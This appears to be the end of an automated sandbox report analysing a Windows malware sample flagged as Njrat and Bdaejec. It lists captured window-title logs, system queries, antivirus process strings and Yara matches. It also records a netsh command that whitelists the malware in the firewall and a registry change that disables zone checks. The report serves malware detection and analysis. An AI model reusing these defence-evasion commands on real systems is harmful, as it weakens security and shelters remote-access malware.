Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 01:40:25 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 08:01:04 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 15:09:56 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/30 | 06:15:21 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 14:21:55 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 07:14:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 13:12:35 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 00:32:21 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 18:28:08 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 02:07:55 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 13:30:23 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 19:42:38 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 07:00:10 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 06:42:21 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 23:09:49 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 06:56:55 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 08:22:08 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 08:30:56 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 00:01:06 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 02:31:12 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/19 | 23:06:05 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 06:31:15 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 20:37:32 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 03:32:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 14:52:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 00:52:29 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 18:25:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 03:04:20 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 18:05:43 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/30 | 05:52:17 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 21:25:42 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/09 | 14:41:50 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 04:20:12 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 18:05:03 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/07/27 | 13:59:49 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 09:47:20 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 00:19:56 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/20 | 00:12:12 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 07:44:25 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 21:30:05 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 05:36:12 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 08:01:34 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 13:28:34 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 15:17:14 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 13:09:01 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 21:13:16 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 21:24:47 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 00:25:47 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 02:38:27 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 00:47:56 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 22:21:26 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 07:13:08 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 23:13:44 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 08:19:48 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 11:13:15 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/28 | 00:36:35 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 15:20:03 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 01:31:28 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 14:56:03 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 14:36:04 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 08:32:17 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 13:56:53 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 14:28:31 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 03:59:18 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 12:04:59 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 02:37:14 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 22:35:43 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 04:13:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 18:17:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 11:35:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 16:25:41 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 04:34:33 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 06:26:38 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 20:27:58 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 23:50:50 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 12:06:13 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 06:07:15 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 10:55:43 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 12:42:07 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 11:58:13 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 12:32:03 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 20:11:24 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 20:45:09 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 13:15:02 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/30 | 06:49:46 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 07:34:10 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 04:42:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 04:05:56 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 12:37:17 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 07:26:00 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/20 | 00:10:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 08:21:35 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 01:36:17 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 23:53:49 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/07/26 | 09:36:29 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 10:53:00 - Program Manager
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,GetLocaleInfoA, 4_2_00B37208
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 1_2_00AE1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv, 1_2_00AE1718
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A1820C GetTimeZoneInformation, 4_2_00A1820C
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 1_2_00AE139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId, 1_2_00AE139F
Source: C:\Users\user\AppData\Local\Temp\server.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disables zone checking for all users
Source: C:\Users\user\AppData\Local\Temp\server.exe Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS Jump to behavior
Modifies the windows firewall
Source: C:\Users\user\AppData\Local\Temp\server.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\server.exe" "server.exe" ENABLE
Uses netsh to modify the Windows network and firewall settings
Source: C:\Users\user\AppData\Local\Temp\server.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\server.exe" "server.exe" ENABLE
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.1.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Bdaejec
Source: Yara match File source: Process Memory Space: RRqyIX.exe PID: 4888, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RRqyIX.exe PID: 1216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RRqyIX.exe PID: 64, type: MEMORYSTR
Yara detected Njrat
Source: Yara match File source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.4628547568.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: LisectAVT_2403002B_366.exe PID: 6620, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: server.exe PID: 6864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe PID: 4068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Microsoft Corporation.exe PID: 1924, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Bdaejec
Source: Yara match File source: Process Memory Space: RRqyIX.exe PID: 4888, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RRqyIX.exe PID: 1216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RRqyIX.exe PID: 64, type: MEMORYSTR
Yara detected Njrat
Source: Yara match File source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.4628547568.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: LisectAVT_2403002B_366.exe PID: 6620, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: server.exe PID: 6864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe PID: 4068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Microsoft Corporation.exe PID: 1924, type: MEMORYSTR
windows-stand
